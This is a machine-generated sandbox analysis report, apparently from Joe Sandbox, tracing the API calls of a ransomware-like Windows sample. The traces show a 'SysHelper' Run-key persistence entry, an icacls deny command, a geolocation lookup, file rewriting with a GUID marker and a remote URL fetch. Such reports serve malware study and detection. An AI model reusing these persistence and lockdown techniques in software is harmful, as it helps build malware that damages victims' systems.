                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00471EA5
                                                                                                                            • GetCommandLineW.KERNEL32 ref: 00471EB4
                                                                                                                            • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00471EBF
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 00471ECE
                                                                                                                            • PathFindFileNameW.SHLWAPI(?), ref: 00471EDB
                                                                                                                            • UuidCreate.RPCRT4(?), ref: 00471EFC
                                                                                                                            • UuidToStringW.RPCRT4(?,?), ref: 00471F14
                                                                                                                            • RpcStringFreeW.RPCRT4(00000000), ref: 00471F64
                                                                                                                            • PathAppendW.SHLWAPI(?,?), ref: 00471F83
                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00471F8E
                                                                                                                            • PathAppendW.SHLWAPI(?,?,?,?), ref: 0047202D
                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 00472036
                                                                                                                            • CopyFileW.KERNEL32(?,?,00000000), ref: 0047204C
                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 0047206E
                                                                                                                            • _memset.LIBCMT ref: 00472090
                                                                                                                            • lstrcpyW.KERNEL32(?,005602FC), ref: 004720AA
                                                                                                                            • lstrcatW.KERNEL32(?,?), ref: 004720C0
                                                                                                                            • lstrcatW.KERNEL32(?," --AutoStart), ref: 004720CE
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 004720D7
                                                                                                                            • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 004720F3
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 004720FC
                                                                                                                            • _memset.LIBCMT ref: 00472120
                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 00472146
                                                                                                                            • lstrcpyW.KERNEL32(?,icacls "), ref: 00472158
                                                                                                                            • lstrcatW.KERNEL32(?,?), ref: 0047216D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                                                                                                                            • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                                                                                                                            • API String ID: 2589766509-1182136429
                                                                                                                            • Opcode ID: 12594434355d41f5fa51b9ec8c61841ab39e7dccdf472197b5caccaf72c6b4f5
                                                                                                                            • Instruction ID: 6fa5f262b01b05fbd2709d1527e0c51e15416143bd43534c892a36d535dda116
                                                                                                                            • Opcode Fuzzy Hash: 12594434355d41f5fa51b9ec8c61841ab39e7dccdf472197b5caccaf72c6b4f5
                                                                                                                            • Instruction Fuzzy Hash: 6EE1AF71D00219ABDF24DBA0CD49FEFBBB8BF04304F1044AAE509A7191EB746A89CF54
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?), ref: 0047120F
                                                                                                                            • GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 00471228
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0047123D
                                                                                                                            • MoveFileW.KERNEL32(00000000,?), ref: 00471277
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00025815,00001000,00000004,?,00000000,?), ref: 004712B1
                                                                                                                            • _memset.LIBCMT ref: 004712C8
                                                                                                                            • SetFilePointerEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 00471301
                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?), ref: 00471314
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0047131B
                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000026,?,00000000,?,00000000,?), ref: 00471349
                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,?,00000000,?), ref: 00471381
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00471388
                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?), ref: 004713E6
                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00025805,?,00000000,?,00000000,?), ref: 00471409
                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?), ref: 00471417
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0047141E
                                                                                                                            • lstrlenA.KERNEL32(?,?,00000000,?), ref: 00471471
                                                                                                                            • lstrlenA.KERNEL32(?,?,?,00000000,?), ref: 00471491
                                                                                                                            • lstrlenA.KERNEL32(?,00000000,?,?,?,?,?,00000000,?), ref: 004714CF
                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000005,00000000,00000000,00000005,00000000,-000000FB,-000000FB,00000000,00000000,000000FF,00000000,00000000,00000000), ref: 0047159D
                                                                                                                            • SetFilePointerEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 004715D0
                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 004715F8
                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00471649
                                                                                                                            • lstrlenA.KERNEL32({36A698B9-D67C-4E07-BE82-0EC5B14B4DF5},00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0047166B
                                                                                                                            • WriteFile.KERNEL32(00000000,{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5},00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00471678
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 0047168D
                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 004716D6
                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004716EB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File$CloseHandleVirtual$FreePointerlstrlen$Write$MoveRead$AllocCreateSize_memset
                                                                                                                            • String ID: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                            • API String ID: 254274740-1186676987
                                                                                                                            • Opcode ID: 662a2683772c121d5f297c8ed048232c75eecf7dad31dbd4682c02e5d7b9e720
                                                                                                                            • Instruction ID: 52531c9328a7ede164959e1c9449a90a44ccf87d75ca7bb7b90b4b90e358a2ef
                                                                                                                            • Opcode Fuzzy Hash: 662a2683772c121d5f297c8ed048232c75eecf7dad31dbd4682c02e5d7b9e720
                                                                                                                            • Instruction Fuzzy Hash: 5022C270D00208EFDB24DBA9DC85BEEBB78EF15304F10815AF519B7292DB785A09CB65
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph
                                                                                                                            • Function at 00472220 (graph rendering not preserved; node legend: Executed / Not Executed)
                                                                                                                            APIs
                                                                                                                            • GetCommandLineW.KERNEL32 ref: 00472235
                                                                                                                            • CommandLineToArgvW.SHELL32(00000000,?), ref: 00472240
                                                                                                                            • PathFindFileNameW.SHLWAPI(00000000), ref: 00472248
                                                                                                                            • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00472256
                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0047226A
                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00472275
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00472280
                                                                                                                            • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00472291
                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0047229F
                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004722AA
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004722B5
                                                                                                                            • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004722CD
                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004722FE
                                                                                                                            • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00472315
                                                                                                                            • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0047232C
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00472347
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                                                                                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                                                                                                                            • API String ID: 3668891214-3807497772
                                                                                                                            • Opcode ID: 390e617f58ca9e7607a0167579456bde888d4115631908521194427c9c65c5f5
                                                                                                                            • Instruction ID: 221d24195813059d9f7e054a1b11b0153e51f2007fe3ad0ab9dcd21e75ba10bc
                                                                                                                            • Opcode Fuzzy Hash: 390e617f58ca9e7607a0167579456bde888d4115631908521194427c9c65c5f5
                                                                                                                            • Instruction Fuzzy Hash: 26315271E00219ABDB10AFA58C45EEFBBB8FF55705F00446AF904E3250EBB49E059FA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • timeGetTime.WINMM ref: 0047F15E
                                                                                                                            • Sleep.KERNEL32(?), ref: 0047F185
                                                                                                                            • Sleep.KERNEL32(?), ref: 0047F19D
                                                                                                                            • SendMessageW.USER32(?,00008003,00000000,00000000), ref: 0047F9D0
                                                                                                                              • Part of subcall function 00470A50: GetLogicalDrives.KERNEL32 ref: 00470A75
                                                                                                                              • Part of subcall function 00470A50: SetErrorMode.KERNEL32(00000001,00560234,00000002), ref: 00470AE2
                                                                                                                              • Part of subcall function 00470A50: PathFileExistsA.SHLWAPI(?), ref: 00470AF9
                                                                                                                              • Part of subcall function 00470A50: SetErrorMode.KERNEL32(00000000), ref: 00470B02
                                                                                                                              • Part of subcall function 00470A50: GetDriveTypeA.KERNEL32(?), ref: 00470B1B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorModeSleep$DriveDrivesExistsFileLogicalMessagePathSendTimeTypetime
                                                                                                                            • String ID: C:\
                                                                                                                            • API String ID: 3672571082-3404278061
                                                                                                                            • Opcode ID: c6db170e2198f42c0c0894c9c678765bd31fb39660e499feb5963e851f998cf2
                                                                                                                            • Instruction ID: 68f7eb96017d497588cfd4f7ada3a4044c988828f0c21cfa2e9e1836d8095c25
                                                                                                                            • Opcode Fuzzy Hash: c6db170e2198f42c0c0894c9c678765bd31fb39660e499feb5963e851f998cf2
                                                                                                                            • Instruction Fuzzy Hash: 5A4270B1D002059BDF24DFA8C945BDEBBF1BF44308F14852EE849AB381D779A909CB95
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph
                                                                                                                            • Function at 0046CF10 (graph rendering not preserved; node legend: Executed / Not Executed)
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0046CF4A
                                                                                                                            • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0046CF5F
                                                                                                                            • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0046CFA6
                                                                                                                            • InternetReadFile.WININET(00000000,?,00002800,?), ref: 0046CFCD
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0046CFDA
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0046CFDD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Internet$CloseHandleOpen$FileRead_memset
                                                                                                                            • String ID: $"country_code":"$$$($Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                                                                                                                            • API String ID: 1485416377-933853286
                                                                                                                            • Opcode ID: 25df1d65e1ad99928e052cd8ceda4bd4c0f4be5bbc62e4356164143f6ee3cae3
                                                                                                                            • Instruction ID: c14736529394499541c8d56160f7d7a3784d11cf2b20a6b4a897974c3928d28a
                                                                                                                            • Opcode Fuzzy Hash: 25df1d65e1ad99928e052cd8ceda4bd4c0f4be5bbc62e4356164143f6ee3cae3
                                                                                                                            • Instruction Fuzzy Hash: E591C371D00248EBEF20DFA0CD45BEEBBB4BF15708F20455AE4057B281E7BA5A49CB56
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph
                                                                                                                            • Function at 0047BAE0 (graph rendering not preserved; node legend: Executed / Not Executed)
                                                                                                                            APIs
                                                                                                                            • PostQuitMessage.USER32(00000000), ref: 0047BB49
                                                                                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 0047BBBA
                                                                                                                            • _malloc.LIBCMT ref: 0047BBE4
                                                                                                                            • GetComputerNameW.KERNEL32(00000000,?), ref: 0047BBF4
                                                                                                                            • _free.LIBCMT ref: 0047BCD7
                                                                                                                              • Part of subcall function 00471CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,0052AC68,000000FF), ref: 00471D12
                                                                                                                              • Part of subcall function 00471CD0: _memset.LIBCMT ref: 00471D3B
                                                                                                                              • Part of subcall function 00471CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00471D63
                                                                                                                              • Part of subcall function 00471CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0052AC68,000000FF), ref: 00471D6C
                                                                                                                              • Part of subcall function 00471CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00471DD6
                                                                                                                              • Part of subcall function 00471CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00471E48
                                                                                                                            • IsWindow.USER32(?), ref: 0047BF69
                                                                                                                            • DestroyWindow.USER32(?), ref: 0047BF7B
                                                                                                                            • DefWindowProcW.USER32(?,00008003,?,?), ref: 0047BFA8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3873257347-0
                                                                                                                            • Opcode ID: 9556c2ef1e6e5dc8986cabb25e0ce3977408c11737112facd32b8638e331e190
                                                                                                                            • Instruction ID: e300812fae18947d0b77bc5eab625d4d4af3f88122f52ba344a76d4532f2ae2d
                                                                                                                            • Opcode Fuzzy Hash: 9556c2ef1e6e5dc8986cabb25e0ce3977408c11737112facd32b8638e331e190
                                                                                                                            • Instruction Fuzzy Hash: 9CC1AD71508340AFDB20DF24D8457ABBBE0FF95718F14891EF889933A1D7799808CB9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 004835B1
                                                                                                                              • Part of subcall function 00485208: __getptd_noexit.LIBCMT ref: 00485208
                                                                                                                            • __gmtime64_s.LIBCMT ref: 0048364A
                                                                                                                            • __gmtime64_s.LIBCMT ref: 00483680
                                                                                                                            • __gmtime64_s.LIBCMT ref: 0048369D
                                                                                                                            • __allrem.LIBCMT ref: 004836F3
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0048370F
                                                                                                                            • __allrem.LIBCMT ref: 00483726
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00483744
                                                                                                                            • __allrem.LIBCMT ref: 0048375B
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00483779
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1503770280-0
                                                                                                                            • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                                            • Instruction ID: 40638daca53146679ffc2dc0bce7f7d1be40b88f96f6423534919253ec6f780a
                                                                                                                            • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                                            • Instruction Fuzzy Hash: 2A71EBF1A00716BBD714BE6ACC41B5E73A4AF00B29F144A3BF914D6781E778EA408798
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00480FDD: __wfsopen.LIBCMT ref: 00480FE8
                                                                                                                            • _fgetws.LIBCMT ref: 0046C7BC
                                                                                                                            • _memmove.LIBCMT ref: 0046C89F
                                                                                                                            • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0046C94B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDirectory__wfsopen_fgetws_memmove
                                                                                                                            • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                                            • API String ID: 2864494435-54166481
                                                                                                                            • Opcode ID: b443970f98c44e8e3b015720f3e3d0ecd4582eb0f3f71ade274a708102e977c5
                                                                                                                            • Instruction ID: 7c1d9cbdc844d2066280f59721cb396b14e817b3c99122331cf76a8b439d4e7f
                                                                                                                            • Opcode Fuzzy Hash: b443970f98c44e8e3b015720f3e3d0ecd4582eb0f3f71ade274a708102e977c5
                                                                                                                            • Instruction Fuzzy Hash: FC9183B1D003199BDF20EFA5C9857AFB7B5BF04304F14052BE855A3241F779AA18CB9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • LoadLibraryW.KERNEL32(Shell32.dll,75B04E90), ref: 0046F338
                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0046F353
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                            • String ID: SHGetFolderPathW$Shell32.dll$\
                                                                                                                            • API String ID: 2574300362-2555811374
                                                                                                                            • Opcode ID: 62695cabbdbed57a1b501f5f0a513200bd0048d412bc2de0d89bf0ae8b423565
                                                                                                                            • Instruction ID: 159db3e0fdd4b31f7a8eaf3284d49824f814c6c2a87dbf4b7ffd28ca26f40d36
                                                                                                                            • Opcode Fuzzy Hash: 62695cabbdbed57a1b501f5f0a513200bd0048d412bc2de0d89bf0ae8b423565
                                                                                                                            • Instruction Fuzzy Hash: BEC16F71D01209EBDF00DFA4DD49BDEBBB5BF14308F10442AE405B7291E7B99A19CB9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,0047E6D4), ref: 0046C6C2
                                                                                                                            • RegQueryValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,?), ref: 0046C6F3
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0046C700
                                                                                                                            • RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0046C725
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0046C72E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseValue$OpenQuery
                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                                                                                                                            • API String ID: 3962714758-1667468722
                                                                                                                            • Opcode ID: d935002d961569eaede09362cc8d224887099ea45f02de50f73a2653c1c6e0c9
                                                                                                                            • Instruction ID: 47a4b7530c2c47492d265e308e2820d872026311c0572f8f5994cf9781f23334
                                                                                                                            • Opcode Fuzzy Hash: d935002d961569eaede09362cc8d224887099ea45f02de50f73a2653c1c6e0c9
                                                                                                                            • Instruction Fuzzy Hash: 6E111E75940208FBDB209F90CC4AFEEBF78FF14705F104195EA00B2191E7B15A19AB55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0047E707
                                                                                                                              • Part of subcall function 0046C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 0046C51B
                                                                                                                            • InternetOpenW.WININET ref: 0047E743
                                                                                                                            • _wcsstr.LIBCMT ref: 0047E7AE
                                                                                                                            • _memmove.LIBCMT ref: 0047E838
                                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 0047E90A
                                                                                                                            • lstrcatW.KERNEL32(?,&first=false), ref: 0047E93D
                                                                                                                            • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0047E954
                                                                                                                            • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0047E96F
